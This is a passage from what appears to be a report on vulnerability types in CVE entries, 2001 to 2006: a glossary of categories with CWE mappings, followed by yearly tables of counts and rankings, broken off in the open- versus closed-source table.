Description: Assigns bad permissions, improperly calculates permissions, or improperly checks permissions

Type: php-include
CWE: CWE-98
Description: PHP remote file inclusion

Type: priv
CWE: CWE-266, CWE-274, CWE-272, CWE-250, CWE-264, CWE-265, CWE-268, CWE-270, CWE-271, CWE-269, CWE-267
Description: Bad privilege assignment, or privileged process/action is unprotected/unauthenticated.

Type: race
CWE: CWE-362, CWE-366, CWE-364, CWE-367, CWE-421, CWE-368, CWE-363, CWE-370
Description: General race condition (NOT SYMBOLIC LINK FOLLOWING (link)!)

Type: rand
CWE: CWE-330, CWE-331, CWE-332, CWE-338, CWE-342, CWE-341, CWE-339, others
Description: Generation of insufficiently random numbers, typically by using easily guessable sources of "random" data

Type: relpath
CWE: CWE-426, CWE-428, CWE-114
Description: Untrusted search path vulnerability - Relies on search paths to find other executable programs or files, opening up to Trojan horse attacks, e.g., PATH environment variable in Unix.

Type: sandbox
CWE: CWE-265
Description: Java/etc. sandbox escape - NOT BY DOT-DOT!

Type: signedness
CWE: CWE-195, CWE-196
Description: Signedness error; a numeric value in one format/representation is improperly handled when it is used as if it were another format/representation. Overlaps integer overflows and array index errors.

Type: spoof
CWE: CWE-290, CWE-350, CWE-347, CWE-345, CWE-247, CWE-292, CWE-291
Description: Product is vulnerable to spoofing attacks, generally by not properly verifying authenticity.

Type: sql-inject
CWE: CWE-89
Description: SQL injection vulnerability

Type: type-check
CWE: unknown
Description: Product incorrectly identifies the type of an input parameter or file, then dispatches the wrong "executable" (possibly itself) to process the input, or otherwise misrepresents the input in a security-critical way.
Type: unk
CWE: none
Description: Unknown vulnerability; report is too vague to determine type of issue.

Type: upload
CWE: CWE-434
Description: Product does not restrict the extensions for files that can be uploaded to the web server, leading to code execution if executable extensions are used in filenames, such as .asp, .php, and .shtml.

Type: webroot
CWE: CWE-219, CWE-433
Description: Storage of sensitive data under web document root with insufficient access control.

Type: XSS
CWE: CWE-79, CWE-80, CWE-87, CWE-85, CWE-82, CWE-81, CWE-83, CWE-84
Description: Cross-site scripting (aka XSS)

====================================
===== Table 1: Overall Results =====
====================================

                    TOTAL       2001        2002        2003        2004        2005        2006
                    (16192)     (1434)      (2138)      (1173)      (2534)      (4538)      (4375)
                    ----------  ----------  ----------  ----------  ----------  ----------  ----------
[ 1] XSS            13.9% ( 1)  02.2% (11)  08.7% ( 2)  07.5% ( 2)  10.9% ( 2)  16.0% ( 1)  21.5% ( 1)
                    2247        32          187         88          276         725         939
[ 2] buf            13.3% ( 2)  19.5% ( 1)  20.3% ( 1)  22.5% ( 1)  15.4% ( 1)  09.8% ( 3)  07.9% ( 4)
                    2156        279         433         264         391         445         344
[ 3] sql-inject     08.7% ( 3)  00.4% (27)  01.8% (12)  03.0% ( 4)  05.5% ( 3)  12.9% ( 2)  14.0% ( 2)
                    1416        6           38          35          140         584         613
[ 4] dot            04.7% ( 4)  08.9% ( 2)  05.1% ( 3)  02.9% ( 5)  04.1% ( 4)  04.3% ( 4)  04.4% ( 5)
                    764         127         110         34          104         195         194
[ 5] php-include    03.5% ( 5)  00.1% (31)  00.3% (30)  00.8% (15)  01.4% (10)  02.1% ( 6)  09.5% ( 3)
                    561         1           6           9           36          95          414
[ 6] infoleak       03.3% ( 6)  02.6% ( 9)  04.2% ( 5)  02.6% ( 7)  03.7% ( 5)  03.9% ( 5)  02.6% ( 6)
                    540         37          89          30          95          175         114
[ 7] dos-malform    02.9% ( 7)  04.8% ( 3)  05.1% ( 4)  02.5% ( 8)  03.4% ( 6)  01.8% ( 8)  02.0% ( 7)
                    463         69          110         29          87          82          86
[ 8] link           02.0% ( 8)  04.5% ( 4)  02.1% ( 9)  03.5% ( 3)  02.8% ( 7)  01.9% ( 7)  00.5% (16)
                    329         64          45          41          72          87          20
[ 9] format-string  01.8% ( 9)  03.2% ( 7)  01.8% (11)  02.7% ( 6)  02.4% ( 8)  01.7% ( 9)  01.0% (10)
                    296         46          39          32          61          76          42
[10] crypt          01.6% (10)  03.8% ( 6)  02.7% ( 6)  01.5% ( 9)  00.9% (16)  01.5% (10)  00.9% (11)
                    261         55          58          18          22          68          40
[11] priv           01.4% (11)  02.5% (10)  02.2% ( 8)  01.0% (12)  01.3% (11)  01.5% (11)  00.9% (12)
                    233         36          46          12          32          67          40
[12] metachar       01.3% (12)  03.8% ( 5)  02.6% ( 7)  00.7% (17)  01.0% (14)  01.3% (12)  00.3% (20)
                    218         55          56          8           26          59          14
[13] perm           01.3% (13)  02.7% ( 8)  01.8% (10)  01.3% (11)  00.9% (15)  01.1% (13)  01.1% ( 9)
                    215         39          39          15          24          48          50
[14] int-overflow   01.0% (14)  00.1% (32)  00.4% (22)  01.4% (10)  01.9% ( 9)  00.8% (15)  01.2% ( 8)
                    160         1           8           16          47          36          52
[15] dos-flood      00.8% (15)  02.0% (12)  01.7% (13)  00.5% (19)  01.2% (12)  00.2% (27)  00.4% (17)
                    131         29          36          6           31          10          19
[16] pass           00.8% (16)  01.1% (18)  01.3% (14)  00.2% (28)  01.1% (13)  00.8% (14)  00.4% (18)
                    125         16          27          2           28          36          16
[17] auth           00.8% (17)  01.5% (13)  01.3% (15)  00.5% (20)  00.7% (17)  00.5% (19)  00.7% (14)
                    124         22          27          6           17          21          31
[18] webroot        00.5% (18)  00.1% (29)  00.2% (32)  00.3% (24)  00.2% (30)  00.7% (16)  00.9% (13)
                    88          2           5           3           5           33          40
[19] form-field     00.5% (19)  00.7% (24)  00.8% (17)  00.5% (21)  00.2% (27)  00.4% (20)  00.5% (15)
                    81          10          17          6           6           19          23
[20] relpath        00.4% (20)  00.8% (22)  00.3% (29)  00.9% (14)  00.6% (18)  00.3% (22)  00.3% (21)
                    71          12          6           10          14          15          14
[21] race           00.4% (21)  00.5% (26)  00.4% (24)  00.6% (18)  00.4% (21)  00.6% (17)  00.3% (24)
                    69          7           8           7           10          26          11
[22] memleak        00.4% (22)  01.1% (17)  00.2% (31)  00.4% (22)  00.5% (19)  00.3% (23)  00.2% (27)
                    61          16          5           5           13          15          7
[23] msdos-device   00.4% (23)  01.0% (20)  00.6% (19)  00.9% (13)  00.2% (23)  00.2% (28)  00.0% (32)
                    57          15          13          11          6           10          2
[24] crlf           00.3% (24)  00.0% N/A   00.2% (33)  00.1% (30)  00.5% (20)  00.4% (21)  00.3% (19)
                    49          0           4           1           13          17          14
[25] default        00.3% (26)  01.1% (16)  00.7% (18)  00.1% (33)  00.2% (26)  00.1% (33)  00.1% (29)
                    48          16          16          1           6           3           6
[26] spoof          00.3% (25)  01.0% (19)  00.3% (28)  00.1% (32)  00.1% (33)  00.2% (26)  00.3% (25)
                    48          15          7           1           3           11          11
[27] sandbox        00.3% (27)  01.2% (15)  01.0% (16)  00.0% N/A   00.2% (29)  00.0% (34)  00.0% N/A
                    46          17          22          0           5           2           0
[28] rand           00.3% (28)  01.2% (14)  00.6% (20)  00.3% (25)  00.2% (32)  00.0% (35)  00.2% (26)
                    45          17          12          3           4           2           7
[29] upload         00.3% (29)  00.0% N/A   00.0% (36)  00.1% (29)  00.2% (24)  00.5% (18)  00.3% (22)
                    43          0           1           1           6           22          13
[30] signedness     00.2% (30)  00.1% (30)  00.4% (23)  00.8% (16)  00.2% (25)  00.3% (24)  00.0% (34)
                    38          1           8           9           6           12          2
[31] dos-release    00.2% (31)  00.9% (21)  00.5% (21)  00.2% (27)  00.2% (31)  00.0% N/A   00.0% N/A
                    30          13          10          2           5           0           0
[32] CF             00.2% (32)  00.7% (23)  00.3% (27)  00.2% (26)  00.0% N/A   00.1% (31)  00.1% (28)
                    29          10          7           2           0           4           6
[33] eval-inject    00.2% (33)  00.0% N/A   00.0% N/A   00.0% N/A   00.0% (34)  00.2% (25)  00.3% (23)
                    25          0           0           0           1           11          13
[34] design         00.1% (34)  00.6% (25)  00.4% (26)  00.1% (31)  00.0% (35)  00.1% (32)  00.0% (31)
                    23          8           8           1           1           3           2
[35] double-free    00.1% (35)  00.0% N/A   00.1% (34)  00.3% (23)  00.2% (22)  00.1% (30)  00.1% (30)
                    21          0           2           4           6           5           4
[36] CSRF           00.1% (37)  00.0% N/A   00.0% (35)  00.0% N/A   00.2% (28)  00.2% (29)  00.0% (33)
                    16          0           1           0           5           8           2
[37] type-check     00.1% (36)  00.4% (28)  00.4% (25)  00.0% N/A   00.0% N/A   00.0% (36)  00.0% (35)
                    16          6           8           0           0           1           1

-------------------------
UNKNOWN/UNSPECIFIED ITEMS
-------------------------
n/a  unk            09.0% N/A   07.9% N/A   07.1% N/A   07.0% N/A   08.2% N/A   08.9% N/A   11.5% N/A
                    1460        114         151         82          209         402         502
n/a  other          15.2% N/A   16.7% N/A   19.0% N/A   11.8% N/A   17.2% N/A   13.1% N/A   14.9% N/A
                    2468        239         407         139         435         595         653
n/a  not-specified  06.9% N/A   00.1% N/A   03.1% N/A   20.5% N/A   11.3% N/A   11.3% N/A   00.3% N/A
                    1121        2           66          240         286         513         14

===============================
===== Table 2: OS Vendors =====
===============================

                    TOTAL       2001        2002        2003        2004        2005        2006
                    (4418)      ( 443)      ( 660)      ( 527)      ( 736)      (1199)      ( 853)
                    ----------  ----------  ----------  ----------  ----------  ----------  ----------
[ 1] buf            20.0% ( 1)  21.0% ( 1)  26.8% ( 1)  24.9% ( 1)  20.4% ( 1)  16.2% ( 1)  16.1% ( 1)
                    882         93          177         131         150         194         137
[ 2] link           04.0% ( 2)  07.4% ( 2)  03.3% ( 4)  04.0% ( 2)  05.2% ( 2)  04.0% ( 3)  01.8% ( 5)
                    177         33          22          21          38          48          15
[ 3] dos-malform    03.7% ( 3)  05.6% ( 3)  06.1% ( 2)  02.7% ( 4)  04.5% ( 4)  01.8% ( 7)  03.3% ( 4)
                    162         25          40          14          33          22          28
[ 4] XSS            03.4% ( 4)  01.6% (12)  04.4% ( 3)  03.0% ( 3)  01.4% ( 7)  04.2% ( 2)  04.7% ( 3)
                    152         7           29          16          10          50          40
[ 5] int-overflow   02.7% ( 5)  00.0% N/A   01.2% (12)  02.3% ( 6)  04.6% ( 3)  02.1% ( 6)  04.7% ( 2)
                    119         0           8           12          34          25          40
[ 6] format-string  02.4% ( 6)  05.2% ( 4)  01.5% (10)  02.3% ( 5)  02.6% ( 5)  02.4% ( 5)  01.6% ( 7)
                    107         23          10          12          19          29          14
[ 7] priv           02.0% ( 7)  04.1% ( 5)  02.3% ( 6)  00.8% (13)  00.8% (14)  02.6% ( 4)  01.6% ( 6)
                    88          18          15          4           6           31          14
[ 8] perm           01.8% ( 8)  04.1% ( 6)  02.1% ( 7)  01.1% (11)  01.1% (10)  01.7% ( 8)  01.4% ( 9)
                    78          18          14          6           8           20          12
[ 9] dot            01.4% ( 9)  01.6% (13)  01.5% ( 9)  01.1% ( 8)  01.6% ( 6)  01.3% (12)  01.6% ( 8)
                    64          7           10          6           12          15          14
[10] metachar       01.2% (10)  02.0% ( 9)  02.6% ( 5)  00.8% (16)  00.7% (17)  01.3% (11)  00.4% (19)
                    53          9           17          4           5           15          3
[11] infoleak       01.2% (11)  00.9% (20)  01.2% (13)  01.1% ( 9)  01.1% ( 9)  01.3% (10)  01.2% (10)
                    52          4           8           6           8           16          10
[12] race           01.0% (12)  01.1% (17)  00.9% (15)  00.4% (19)  01.0% (11)  01.6% ( 9)  00.7% (13)
                    45          5           6           2           7           19          6
[13] memleak        00.8% (13)  02.0% (10)  00.6% (19)  00.8% (14)  01.0% (12)  00.9% (14)  00.2% (23)
                    37          9           4           4           7           11          2
[14] sql-inject     00.8% (14)  00.2% (27)  00.6% (21)  01.1% (10)  00.7% (16)  00.9% (13)  00.9% (11)
                    35          1           4           6           5           11          8
[15] crypt          00.8% (15)  01.6% (14)  01.4% (11)  01.1% ( 7)  00.4% (18)  00.4% (18)  00.5% (16)
                    34          7           9           6           3           5           4
[16] sandbox        00.7% (16)  02.7% ( 7)  02.1% ( 8)  00.0% N/A   00.1% (23)  00.2% (28)  00.0% N/A
                    29          12          14          0           1           2           0
[17] relpath        00.6% (18)  01.6% (11)  00.3% (28)  00.4% (18)  01.1% ( 8)  00.3% (27)  00.7% (14)
                    28          7           2           2           8           3           6
[18] dos-flood      00.6% (17)  02.5% ( 8)  00.6% (20)  00.2% (22)  00.3% (20)  00.3% (25)  00.8% (12)
                    28          11          4           1           2           3           7
[19] auth           00.5% (20)  01.4% (15)  01.1% (14)  00.6% (17)  00.3% (21)  00.3% (21)  00.2% (24)
                    24          6           7           3           2           4           2
[20] signedness     00.5% (19)  00.2% (24)  00.9% (16)  00.9% (12)  00.4% (19)  00.6% (15)  00.2% (25)
                    24          1           6           5           3           7           2
[21] pass           00.5% (21)  00.2% (25)  00.8% (17)  00.2% (20)  00.8% (15)  00.3% (24)  00.5% (15)
                    21          1           5           1           6           4           4
[22] double-free    00.4% (22)  00.0% N/A   00.3% (29)  00.8% (15)  00.8% (13)  00.3% (20)  00.4% (18)
                    19          0           2           4           6           4           3
[23] rand           00.3% (23)  01.4% (16)  00.5% (22)  00.2% (27)  00.1% (24)  00.0% N/A   00.2% (27)
                    13          6           3           1           1           0           2
[24] crlf           00.2% (25)  00.0% N/A   00.5% (23)  00.2% (25)  00.0% N/A   00.4% (17)  00.2% (20)
                    11          0           3           1           0           5           2
[25] spoof          00.2% (24)  00.2% (26)  00.3% (26)  00.0% N/A   00.0% N/A   00.3% (23)  00.5% (17)
                    11          1           2           0           0           4           4
[26] form-field     00.2% (26)  00.5% (22)  00.3% (27)  00.2% (21)  00.0% N/A   00.4% (16)  00.0% N/A
                    10          2           2           1           0           5           0
[27] default        00.2% (27)  00.2% (28)  00.5% (24)  00.0% N/A   00.1% (22)  00.3% (26)  00.2% (21)
                    10          1           3           0           1           3           2
[28] type-check     00.2% (28)  00.7% (21)  00.6% (18)  00.0% N/A   00.0% N/A   00.1% (30)  00.0% N/A
                    8           3           4           0           0           1           0
[29] CF             00.2% (29)  00.9% (18)  00.2% (31)  00.2% (26)  00.0% N/A   00.0% N/A   00.1% (29)
                    7           4           1           1           0           0           1
[30] dos-release    00.2% (30)  00.9% (19)  00.3% (25)  00.2% (23)  00.0% N/A   00.0% N/A   00.0% N/A
                    7           4           2           1           0           0           0
[31] php-include    00.1% (31)  00.0% N/A   00.0% N/A   00.0% N/A   00.0% N/A   00.3% (19)  00.2% (26)
                    6           0           0           0           0           4           2
[32] eval-inject    00.1% (32)  00.0% N/A   00.0% N/A   00.0% N/A   00.0% N/A   00.3% (22)  00.2% (22)
                    6           0           0           0           0           4           2
[33] design         00.1% (33)  00.2% (23)  00.3% (30)  00.2% (24)  00.0% N/A   00.1% (31)  00.0% N/A
                    5           1           2           1           0           1           0
[34] webroot        00.0% (35)  00.0% N/A   00.0% N/A   00.0% N/A   00.0% N/A   00.0% N/A   00.1% (28)
                    1           0           0           0           0           0           1
[35] upload         00.0% (36)  00.0% N/A   00.0% N/A   00.0% N/A   00.0% N/A   00.1% (32)  00.0% N/A
                    1           0           0           0           0           1           0
[36] CSRF           00.0% (34)  00.0% N/A   00.0% N/A   00.0% N/A   00.0% N/A   00.1% (29)  00.0% N/A
                    1           0           0           0           0           1           0

-------------------------
UNKNOWN/UNSPECIFIED ITEMS
-------------------------
n/a  unk            16.0% N/A   12.4% N/A   12.6% N/A   10.4% N/A   12.2% N/A   16.1% N/A   27.2% N/A
                    708         55          83          55          90          193         232
n/a  other          16.4% N/A   15.3% N/A   15.6% N/A   12.0% N/A   12.2% N/A   14.4% N/A   26.6% N/A
                    724         68          103         63          90          173         227
n/a  not-specified  14.3% N/A   00.2% N/A   05.9% N/A   26.0% N/A   24.6% N/A   22.2% N/A   00.8% N/A
                    631         1           39          137         181         266         7

==========================================
===== Table 3: OS Vendors vs. Others =====
==========================================

                    TOTAL       2001        2002        2003        2004        2005        2006
                    ----------  ----------  ----------  ----------  ----------  ----------  ----------
OS-ven              4418        443         660         527         736         1199        853
Other               11774       991         1478        646         1798        3339        3522
                    ----------  ----------  ----------  ----------  ----------  ----------  ----------
[ 1] XSS            03.4% ( 4)  01.6% (13)  04.4% ( 3)  03.0% ( 3)  01.4% ( 7)  04.2% ( 2)  04.7% ( 2)
                    152         7           29          16          10          50          40
     ****           17.8% ( 1)  02.5% ( 8)  10.7% ( 2)  11.1% ( 2)  14.8% ( 1)  20.2% ( 1)  25.5% ( 1)
                    2095        25          158         72          266         675         899
[ 2] buf            20.0% ( 1)  21.0% ( 1)  26.8% ( 1)  24.9% ( 1)  20.4% ( 1)  16.2% ( 1)  16.1% ( 1)
                    882         93          177         131         150         194         137
     ****           10.8% ( 3)  18.8% ( 1)  17.3% ( 1)  20.6% ( 1)  13.4% ( 2)  07.5% ( 3)  05.9% ( 4)
                    1274        186         256         133         241         251         207
[ 3] sql-inject     00.8% (14)  00.2% (27)  00.6% (19)  01.1% ( 8)  00.7% (16)  00.9% (13)  00.9% (11)
                    35          1           4           6           5           11          8
     ****           11.7% ( 2)  00.5% (26)  02.3% ( 8)  04.5% ( 3)  07.5% ( 3)  17.2% ( 2)  17.2% ( 2)
                    1381        5           34          29          135         573         605
[ 4] dot            01.4% ( 9)  01.6% (14)  01.5% ( 9)  01.1% (10)  01.6% ( 6)  01.3% (11)  01.6% ( 8)
                    64          7           10          6           12          15          14
     ****           05.9% ( 4)  12.1% ( 2)  06.8% ( 3)  04.3% ( 4)  05.1% ( 4)  05.4% ( 4)  05.1% ( 5)
                    700         120         100         28          92          180         180
[ 5] php-include    00.1% (32)  00.0% N/A   00.0% N/A   00.0% N/A   00.0% N/A   00.3% (19)  00.2% (27)
                    6           0           0           0           0           4           2
     ****           04.7% ( 5)  00.1% (30)  00.4% (22)  01.4% (11)  02.0% ( 8)  02.7% ( 6)  11.7% ( 3)
                    555         1           6           9           36          91          412
[ 6] infoleak       01.2% (11)  00.9% (20)  01.2% (13)  01.1% (11)  01.1% ( 9)  01.3% (10)  01.2% (10)
                    52          4           8           6           8           16          10
     ****           04.1% ( 6)  03.3% ( 6)  05.5% ( 4)  03.7% ( 5)  04.8% ( 5)  04.8% ( 5)  03.0% ( 6)
                    488         33          81          24          87          159         104
[ 7] dos-malform    03.7% ( 3)  05.6% ( 3)  06.1% ( 2)  02.7% ( 4)  04.5% ( 4)  01.8% ( 7)  03.3% ( 4)
                    162         25          40          14          33          22          28
     ****           02.6% ( 7)  04.4% ( 5)  04.7% ( 5)  02.3% ( 8)  03.0% ( 6)  01.8% ( 8)  01.6% ( 7)
                    301         44          70          15          54          60          58
[ 8] link           04.0% ( 2)  07.4% ( 2)  03.3% ( 4)  04.0% ( 2)  05.2% ( 2)  04.0% ( 3)  01.8% ( 5)
                    177         33          22          21          38          48          15
     ****           01.3% (11)  03.1% ( 7)  01.6% (13)  03.1% ( 7)  01.9% ( 9)  01.2% (11)  00.1% (25)
                    152         31          23          20          34          39          5
[ 9] format-string  02.4% ( 6)  05.2% ( 4)  01.5% (10)  02.3% ( 6)  02.6% ( 5)  02.4% ( 5)  01.6% ( 6)
                    107         23          10          12          19          29          14
     ****           01.6% ( 9)  02.3% ( 9)  02.0% (11)  03.1% ( 6)  02.3% ( 7)  01.4% ( 9)  00.8% (12)
                    189         23          29          20          42          47          28
[10] crypt          00.8% (15)  01.6% (12)  01.4% (11)  01.1% ( 9)  00.4% (19)  00.4% (16)  00.5% (15)
                    34          7           9           6           3           5           4
     ****           01.9% ( 8)  04.8% ( 3)  03.3% ( 6)  01.9% ( 9)  01.1% (14)  01.9% ( 7)  01.0% (10)
                    227         48          49          12          19          63          36
[11] priv           02.0% ( 7)  04.1% ( 5)  02.3% ( 6)  00.8% (16)  00.8% (13)  02.6% ( 4)  01.6% ( 7)
                    88          18          15          4           6           31          14
     ****           01.2% (12)  01.8% (12)  02.1% (10)  01.2% (14)  01.4% (11)  01.1% (12)  00.7% (13)
                    145         18          31          8           26          36          26
[12] metachar       01.2% (10)  02.0% (10)  02.6% ( 5)  00.8% (15)  00.7% (17)  01.3% (12)  00.4% (19)
                    53          9           17          4           5           15          3
     ****           01.4% (10)  04.6% ( 4)  02.6% ( 7)  00.6% (20)  01.2% (13)  01.3% (10)  00.3% (21)
                    165         46          39          4           21          44          11
[13] perm           01.8% ( 8)  04.1% ( 6)  02.1% ( 7)  01.1% ( 7)  01.1% (10)  01.7% ( 8)  01.4% ( 9)
                    78          18          14          6           8           20          12
     ****           01.2% (13)  02.1% (10)  01.7% (12)  01.4% (12)  00.9% (15)  00.8% (15)  01.1% ( 9)
                    137         21          25          9           16          28          38
[14] int-overflow   02.7% ( 5)  00.0% N/A   01.2% (12)  02.3% ( 5)  04.6% ( 3)  02.1% ( 6)  04.7% ( 3)
                    119         0           8           12          34          25          40
     ****           00.3% (22)  00.1% (31)  00.0% N/A   00.6% (18)  00.7% (17)  00.3% (21)  00.3% (17)
                    41          1           0           4           13          11          12
[15] dos-flood      00.6% (18)  02.5% ( 8)  00.6% (18)  00.2% (27)  00.3% (21)  00.3% (26)  00.8% (12)
                    28          11          4           1           2           3           7
     ****           00.9% (15)  01.8% (11)  02.2% ( 9)  00.8% (17)  01.6% (10)  00.2% (23)  00.3% (18)
                    103         18          32          5           29          7           12
[16] pass           00.5% (21)  00.2% (25)  00.8% (17)  00.2% (26)  00.8% (15)  00.3% (20)  00.5% (17)
                    21          1           5           1           6           4           4
     ****           00.9% (14)  01.5% (16)  01.5% (14)  00.2% (27)  01.2% (12)  01.0% (14)  00.3% (16)
                    104         15          22          1           22          32          12
[17] auth           00.5% (20)  01.4% (15)  01.1% (14)  00.6% (17)  00.3% (20)  00.3% (23)  00.2% (23)
                    24          6           7           3           2           4           2
     ****           00.8% (16)  01.6% (13)  01.4% (15)  00.5% (22)  00.8% (16)  00.5% (17)  00.8% (11)
                    100         16          20          3           15          17          29
[18] webroot        00.0% (35)  00.0% N/A   00.0% N/A   00.0% N/A   00.0% N/A   00.0% N/A   00.1% (28)
                    1           0           0           0           0           0           1
     ****           00.7% (17)  00.2% (28)  00.3% (26)  00.5% (21)  00.3% (26)  01.0% (13)  01.1% ( 8)
                    87          2           5           3           5           33          39
[19] form-field     00.2% (27)  00.5% (22)  00.3% (26)  00.2% (21)  00.0% N/A   00.4% (18)  00.0% N/A
                    10          2           2           1           0           5           0
     ****           00.6% (18)  00.8% (20)  01.0% (16)  00.8% (15)  00.3% (23)  00.4% (18)  00.7% (14)
                    71          8           15          5           6           14          23
[20] relpath        00.6% (17)  01.6% (11)  00.3% (25)  00.4% (19)  01.1% ( 8)  00.3% (27)  00.7% (13)
                    28          7           2           2           8           3           6
     ****           00.4% (20)  00.5% (25)  00.3% (27)  01.2% (13)  00.3% (22)  00.4% (19)  00.2% (22)
                    43          5           4           8           6           12          8
[21] race           01.0% (12)  01.1% (17)  00.9% (16)  00.4% (18)  01.0% (12)  01.6% ( 9)  00.7% (14)
                    45          5           6           2           7           19          6
     ****           00.2% (27)  00.2% (29)  00.1% (29)  00.8% (16)  00.2% (30)  00.2% (27)  00.1% (24)
                    24          2           2           5           3           7           5
[22] memleak        00.8% (13)  02.0% ( 9)  00.6% (20)  00.8% (13)  01.0% (11)  00.9% (14)  00.2% (25)
                    37          9           4           4           7           11          2
     ****           00.2% (28)  00.7% (22)  00.1% (33)  00.2% (29)  00.3% (19)  00.1% (30)  00.1% (26)
                    24          7           1           1           6           4           5
[23] msdos-device   00.0% N/A   00.0% N/A   00.0% N/A   00.0% N/A   00.0% N/A   00.0% N/A   00.0% N/A
                    0           0           0           0           0           0           0
     ****           00.5% (19)  01.5% (15)  00.9% (17)  01.7% (10)  00.3% (21)  00.3% (22)  00.1% (31)
                    57          15          13          11          6           10          2
[24] crlf           00.2% (24)  00.0% N/A   00.5% (23)  00.2% (25)  00.0% N/A   00.4% (17)  00.2% (24)
                    11          0           3           1           0           5           2
     ****           00.3% (23)  00.0% N/A   00.1% (34)  00.0% N/A   00.7% (18)  00.4% (20)  00.3% (19)
                    38          0           1           0           13          12          12
[25] spoof          00.2% (25)  00.2% (28)  00.3% (29)  00.0% N/A   00.0% N/A   00.3% (21)  00.5% (16)
                    11          1           2           0           0           4           4
     ****           00.3% (25)  01.4% (17)  00.3% (25)  00.2% (28)  00.2% (29)  00.2% (25)  00.2% (23)
                    37          14          5           1           3           7           7
[26] default        00.2% (26)  00.2% (26)  00.5% (24)  00.0% N/A   00.1% (22)  00.3% (25)  00.2% (26)
                    10          1           3           0           1           3           2
     ****           00.3% (24)  01.5% (14)  00.9% (18)  00.2% (26)  00.3% (27)  00.0% N/A   00.1% (29)
                    38          15          13          1           5           0           4
[27] sandbox        00.7% (16)  02.7% ( 7)  02.1% ( 8)  00.0% N/A   00.1% (24)  00.2% (28)  00.0% N/A
                    29          12          14          0           1           2           0
     ****           00.1% (33)  00.5% (24)  00.5% (20)  00.0% N/A   00.2% (28)  00.0% N/A   00.0% N/A
                    17          5           8           0           4           0           0
[28] rand           00.3% (23)  01.4% (16)  00.5% (22)  00.2% (23)  00.1% (23)  00.0% N/A   00.2% (22)
                    13          6           3           1           1           0           2
     ****           00.3% (26)  01.1% (18)  00.6% (19)  00.3% (23)  00.2% (32)  00.1% (32)  00.1% (28)
                    32          11          9           2           3           2           5
[29] upload         00.0% (34)  00.0% N/A   00.0% N/A   00.0% N/A   00.0% N/A   00.1% (32)  00.0% N/A
                    1           0           0           0           0           1           0
     ****           00.4% (21)  00.0% N/A   00.1% (32)  00.2% (30)  00.3% (20)  00.6% (16)  00.4% (15)
                    42          0           1           1           6           21          13
[30] signedness     00.5% (19)  00.2% (24)  00.9% (15)  00.9% (12)  00.4% (18)  00.6% (15)  00.2% (20)
                    24          1           6           5           3           7           2
     ****           00.1% (35)  00.0% N/A   00.1% (30)  00.6% (19)  00.2% (31)  00.1% (28)  00.0% N/A
                    14          0           2           4           3           5           0
[31] dos-release    00.2% (29)  00.9% (19)  00.3% (30)  00.2% (20)  00.0% N/A   00.0% N/A   00.0% N/A
                    7           4           2           1           0           0           0
     ****           00.2% (29)  00.9% (19)  00.5% (21)  00.2% (25)  00.3% (25)  00.0% N/A   00.0% N/A
                    23          9           8           1           5           0           0
[32] CF             00.2% (30)  00.9% (18)  00.2% (31)  00.2% (24)  00.0% N/A   00.0% N/A   00.1% (29)
                    7           4           1           1           0           0           1
     ****           00.2% (30)  00.6% (23)  00.4% (23)  00.2% (24)  00.0% N/A   00.1% (29)  00.1% (27)
                    22          6           6           1           0           4           5
[33] eval-inject    00.1% (31)  00.0% N/A   00.0% N/A   00.0% N/A   00.0% N/A   00.3% (22)  00.2% (21)
                    6           0           0           0           0           4           2
     ****           00.2% (31)  00.0% N/A   00.0% N/A   00.0% N/A   00.1% (34)  00.2% (26)  00.3% (20)
                    19          0           0           0           1           7           11
[34] design         00.1% (33)  00.2% (23)  00.3% (27)  00.2% (22)  00.0% N/A   00.1% (30)  00.0% N/A
                    5           1           2           1           0           1           0
     ****           00.2% (32)  00.7% (21)  00.4% (24)  00.0% N/A   00.1% (33)  00.1% (31)  00.1% (32)
                    18          7           6           0           1           2           2
[35] double-free    00.4% (22)  00.0% N/A   00.3% (28)  00.8% (14)  00.8% (14)  00.3% (24)  00.4% (18)
                    19          0           2           4           6           4           3
     ****           00.0% (37)  00.0% N/A   00.0% N/A   00.0% N/A   00.0% N/A   00.0% (33)  00.0% (33)
                    2           0           0           0           0           1           1
[36] type-check     00.2% (28)  00.7% (21)  00.6% (21)  00.0% N/A   00.0% N/A   00.1% (31)  00.0% N/A
                    8           3           4           0           0           1           0
     ****           00.1% (36)  00.3% (27)  00.3% (28)  00.0% N/A   00.0% N/A   00.0% N/A   00.0% (34)
                    8           3           4           0           0           0           1
[37] CSRF           00.0% (36)  00.0% N/A   00.0% N/A   00.0% N/A   00.0% N/A   00.1% (29)  00.0% N/A
                    1           0           0           0           0           1           0
     ****           00.1% (34)  00.0% N/A   00.1% (31)  00.0% N/A   00.3% (24)  00.2% (24)  00.1% (30)
                    15          0           1           0           5           7           2

-------------------------
UNKNOWN/UNSPECIFIED ITEMS
-------------------------
n/a  unk            16.0% N/A   12.4% N/A   12.6% N/A   10.4% N/A   12.2% N/A   16.1% N/A   27.2% N/A
                    708         55          83          55          90          193         232
     ****           06.4% N/A   06.0% N/A   04.6% N/A   04.2% N/A   06.6% N/A   06.3% N/A   07.7% N/A
                    752         59          68          27          119         209         270
n/a  other          16.4% N/A   15.3% N/A   15.6% N/A   12.0% N/A   12.2% N/A   14.4% N/A   26.6% N/A
                    724         68          103         63          90          173         227
     ****           14.8% N/A   17.3% N/A   20.6% N/A   11.8% N/A   19.2% N/A   12.6% N/A   12.1% N/A
                    1744        171         304         76          345         422         426
n/a  not-specified  14.3% N/A   00.2% N/A   05.9% N/A   26.0% N/A   24.6% N/A   22.2% N/A   00.8% N/A
                    631         1           39          137         181         266         7
     ****           04.2% N/A   00.1% N/A   01.8% N/A   15.9% N/A   05.8% N/A   07.4% N/A   00.2% N/A
                    490         1           27          103         105         247         7

==================================================
===== Table 4: Open and Closed Source (OS vendors)
==================================================

                    TOTAL       2001        2002        2003        2004        2005        2006
                    ----------  ----------  ----------  ----------  ----------  ----------  ----------
[ 1] buf            19.7% ( 1)  20.3% ( 1)  24.6% ( 1)  25.0% ( 1)  24.5% ( 1)  14.6% ( 1)  17.1% ( 1)
     ****           20.4% ( 1)  20.3% ( 1)  27.7% ( 1)  26.1% ( 1)  15.3% ( 1)  18.5% ( 1)  16.3% ( 1)
[ 2] link           06.4% ( 2)  14.0% ( 2)  04.8% ( 3)  04.9% ( 2)  08.6% ( 2)  06.1% ( 2)  02.4% ( 5)
     ****           01.6% ( 6)  01.0% (17)  01.8% ( 9)  03.0% ( 2)  01.9% ( 5)  00.8% ( 7)  01.6% ( 6)
